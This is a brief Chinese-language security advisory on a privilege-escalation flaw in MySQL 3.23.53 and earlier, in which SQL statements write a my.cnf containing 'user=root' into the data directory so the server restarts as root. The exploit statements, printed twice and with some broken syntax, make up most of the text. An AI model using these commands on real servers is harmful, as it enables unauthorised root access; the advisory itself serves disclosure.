涉及程序: MYSQL 3.23.53版及其之前的版本 描述: MYSQL 存在权限提升缺陷 详细: MYSQL存在缺陷,如果MYSQL只有一个my.cnf 文件,并且该文件保存在/etc目录下,利用该缺陷将导致攻击者获得MYSQL的root权限。 以root权限创建下列文件: mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES (`
\`); mysql>INSERT IN hack VALUES (\`user=root\`); mysql>SELECT * INTO OUTFILE \`/path/to/mysql/datadir/my.cnf\` FROM hack mysql>QUIT 将在MYSQL的datadir目录中创建一个my.cnf文件,该my.cnf文件包含下列内容:
user=root 当MYSQL重新启动的时候,在datadir目录my.cnf文件中的用户选项将不理会原来的/etc/my.cnf 文件,并直接以root权限运行MYSQL。 攻击方法: 以root权限创建并保存下列文件: mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES (`
\`); mysql>INSERT IN hack VALUES (\`user=root\`); mysql>SELECT * INTO OUTFILE \`/path/to/mysql/datadir/my.cnf\` FROM hack mysql>QUIT 解决方案: 目前厂商还未公布该缺陷补丁,请用户及时关注厂商站点: http://www.mysql.com/